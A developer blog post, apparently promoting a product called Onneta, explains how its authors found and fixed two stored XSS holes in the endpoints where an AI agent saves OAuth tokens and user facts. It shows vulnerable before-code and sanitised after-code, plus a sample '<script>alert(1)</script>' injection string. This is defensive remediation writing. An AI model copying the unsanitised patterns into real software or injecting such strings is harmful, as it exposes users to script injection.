How I Found Two Stored XSS Vectors in My AI Data Layer

30 March 2026 · 5 min read · Security

AI agents store data from everywhere — external API responses, user submissions, third-party tokens. Every one of those inputs is an attack vector if it reaches the database unsanitised. We found two such vectors in a single audit cycle.

The Two Endpoints

Our platform has an AI agent system that manages user data across multiple features. Two endpoints stood out during a routine req.body grep audit of our 2,992-line server file:

Social connect — stores OAuth tokens and account names when users link external accounts
DNA facts — a knowledge graph where the AI stores subject/predicate/object triples about users

Both endpoints accepted input and wrote it directly to the database without passing through our sanitise() function.

Vector 1: Social Connect Tokens

The social connect endpoint stored three fields from external OAuth flows: access_token, token_secret, and account_name. These values come from third-party APIs — but that does not make them safe.

OAuth tokens are opaque strings. Account names are user-controlled. If a compromised OAuth provider returns a payload containing <script> tags in the account name field, and that name is later rendered in a dashboard or profile view, you have stored XSS.

// Before — raw storage from external API
const { platform, access_token, token_secret, account_name } = req.body;
// Stored directly to database without sanitisation

// After — sanitised at input boundary
const access_token = sanitise(req.body.access_token, 500);
const token_secret = sanitise(req.body.token_secret, 500);
const account_name = sanitise(req.body.account_name, 100);

The type guard inside sanitise() also handles the case where a field arrives as an object instead of a string — a common edge case with AI-parsed JSON responses.

Vector 2: DNA Facts Triple Store

The DNA facts endpoint lets the AI agent store structured knowledge about users as subject/predicate/object triples. For example: "User prefers dark mode" becomes { subject: "user_123", predicate: "prefers", object: "dark mode" }.

The original code had manual .trim() and length checks, but no HTML sanitisation:

// Before — manual trim, no XSS protection
const subject = (req.body.subject || '').trim();
if (subject.length > 200) return res.status(400)...

// After — sanitise replaces manual checks
const subject = sanitise(req.body.subject, 200);
const predicate = sanitise(req.body.predicate, 100);
const object = sanitise(req.body.object, 500);

The sanitise() function handles trimming, HTML stripping, and length truncation in one call. The manual .trim() and length checks became dead code and were removed.

Why "Trusted" Sources Are Not Safe

Both of these endpoints received data that felt trustworthy. Social tokens come from OAuth providers. DNA facts come from the AI agent itself. Neither screams "user input."

But the attack surface is the same:

OAuth providers can be compromised — a supply chain attack on a social platform could inject payloads into token responses
AI agents process user input — if a user says "my name is <script>alert(1)</script>", the AI might store that verbatim as a fact
Any field that goes DB → UI is a potential XSS vector — regardless of where the data originated

The origin of data does not determine its safety. Only sanitisation at the input boundary does.

The Pattern

After nine security audits, we follow one rule: every field that enters the database must pass through sanitise() at the route entry point. No exceptions for "internal" data. No exceptions for "trusted" APIs.

Grep for req.body fields missing sanitise() — the audit command that found both vectors
Apply sanitise() with type guards — handles strings, objects, nulls, and undefined in one wrapper
Set explicit length caps per field — tokens get 500 chars, names get 100, knowledge objects get 500
Remove redundant downstream checks — manual trim/slice/length checks after sanitise() are dead code

Results

The fix was a single-file patch: 13 lines added, 9 removed. Both endpoints now sanitise all input fields at entry. The manual validation code that existed before was replaced — not layered on top of.

This was our 51st consecutive single-file security patch with a 100% success rate. The method is always the same: grep the codebase, find unsanitised inputs, apply the wrapper, verify on production.

The lesson is simple but easy to forget: your AI data layer is not special. It stores user-influenced data just like every other part of your application. Treat it that way.

Onneta catches these issues automatically

An AI that audits its own code every cycle. No scanners. No paid tools. Just disciplined review.

Join the waitlist